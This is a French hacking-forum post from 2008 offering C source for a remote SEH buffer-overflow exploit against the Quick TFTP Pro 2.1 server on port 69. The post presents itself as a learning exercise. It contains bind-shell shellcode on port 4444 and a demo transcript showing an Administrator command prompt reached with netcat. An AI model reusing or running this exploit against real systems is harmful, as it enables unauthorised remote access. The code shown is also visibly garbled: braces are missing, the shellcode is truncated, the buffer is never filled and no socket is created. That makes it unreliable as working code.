[C] Quick TFTP Pro 2.1 SEH Overflow (0day)

Moderator: Mod

[C] Quick TFTP Pro 2.1 SEH Overflow (0day)

Postby kmkz » Mon Aug 04, 2008 7:14 pm


Un petit exploit histoire de m'entrainer un peu en C (je débute ce langage depuis peu ).

L'exploit initial se trouve ici : http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
le but étant ici de recoder cet exploit en C tout en y apportant quelques modifs (et aprés l'avoir tested bien entendu ).

Il exploite un Overflow port 69 ,a été testé sur Windows sp2 et injecte un Shellcode offrant un Bind Shell .
Que dire de plus ...

A part que je le post dans un but purement instructif , pour partager une source parmis tant d'autre , sans aucune prétention venant d'un mec qui se lance dans le C mais qui ne le fait pas pour garder ses codes jalousement et préfère les faires partagés aussi moche soient-ils ( je m'améliorerai , promis :P ).

And now , place a la source tant attendue \o/ (pff..) :oops:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define port 69


Remote Buffer Overflow
Tested on Win.XP sp2 Server
Exploit coded by kmkZ
Just For fun and learn
Do not use this exploit to Destroy
But to teach and reassure

| ||||||||| `--------' | O
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
`------' by kmkZ 1/08/08


¤ Demonstration & Usage of this Exploit ¤

* ~ Enter Target ~ *

[*] Using Socket : 123456789

[*] Connecting ...

[*] Sending Exploit......
[+] Exploit Successful !

[*] BindShell on port 4444

~ # nc -v 4444
(UNKNOWN) [] 4444 (krb524) open
Microsoft Windows XP [Version 5.1.2600]
C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsAdministrator>

/* ******************************************************
************* Fondtions Prototypes *********************

void presentation();
void demo();

/* ******************************************************
********************** Main ****************************

int main(int argc, char **argv[]) /* le main */

char *Cible[150]; //Buffer de 150 (ça devrait suffir)

printf(" * ~ Enter Target ~ * \n");

if(Cible == NULL )
(" [-] Please enter remotehost\n");


return -1;

/* ******************************************************
******* Initialisation-Sockets *************************

struct sockaddr_in to;
struct hostent *toinfo;

to.sin_family = AF_INET;
to.sin_addr.s_addr = inet_addr(Cible);
to.sin_port = htons(port);

/* ******************************************************
************* Connect on remote host *******************

int s =0;

connect(s,(struct sockaddr *)&to,sizeof(struct sockaddr_in));

if(connect(s,(struct sockaddr *)&to,sizeof(struct sockaddr_in)) == -1)
printf(" [-] Connection : Failed \n [~] Please verify the FTP server properties / Quick TFTP Pro 2.1 / \n and try again ;-) \n\n");

printf(" /** ¤ Demonstration & Usage of this Exploit ¤ **/\n");


return -1;

/* ******************************************************
**************** BoF Exploit ***************************

char shellcode="\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\xff\xd0"; /* Bind Shell sur port 4444 */

char buffer[3000];//pas un buffer de tapz la hein ;-)


printf(" [*] Using Socket : %d\n [*] Connecting ...\n [+]Success!\n",connect);

/* ******************************************************
************** Send Shellcode to Remote Host ***********

if (send(s,buffer,3000,0)== -1 )
printf(" [-] Exploit Failed \n [~] Please verify the FTP server properties / Quick TFTP Pro 2.1 / \n and try again ;-) \n\n");
return -1;
printf(" [*] Sending Exploit......\n [+] Exploit Successful ! \n [*] BindShell on port 4444\n\n");

return 0;
/* ******************************************************
********************** Main End ************************

/* ******************************************************
************** Fonctions ******************************

void presentation()
printf("\n\n-------------\n /* - Quick TFTP Pro 2.1 SEH Overflow (0day) - */ \n-------------\n\n\n");

printf("[~] Quick TFTP Pro 2.1 Remote BoF \nCoded by kmkZ\n\n");
printf("¤ Bug Found By :Mati Aharoni \n");
printf("¤ muts..at..offensive-security.com\n");
printf(" [~] Original Source Code here :\n-- http://www.offensive-security.com/0day/quick-tftp-poc.py.txt\n");


void demo()
printf("* ~ Enter Target ~ *\n");
printf("[*] Using Socket : 123456789\n");
printf("[*] Connecting ...\n");
printf("[+]Success! \n");
printf("[*] Sending Exploit......\n");
printf("[+] Exploit Successful ! \n");
printf("[*] BindShell on port 4444\n");

printf(" ~ # nc -v 4444\n");
printf("(UNKNOWN) [] 4444 (krb524) open\n");
printf("Microsoft Windows XP [Version 5.1.2600]\n");
printf("C) Copyright 1985-2001 Microsoft Corp.\n\n");
printf(" C:\Documents and Settings\Administrator> \n\n\n");
printf(" [-] Exploit : Failed \n [~] Please verify the FTP server properties / Quick TFTP Pro 2.1 / \n And/or Exploit Usage ..and try again ;-) \n\n");

/* ******************************************************
************** Close Fonctions ***********************
User avatar
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse

Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 4 guests
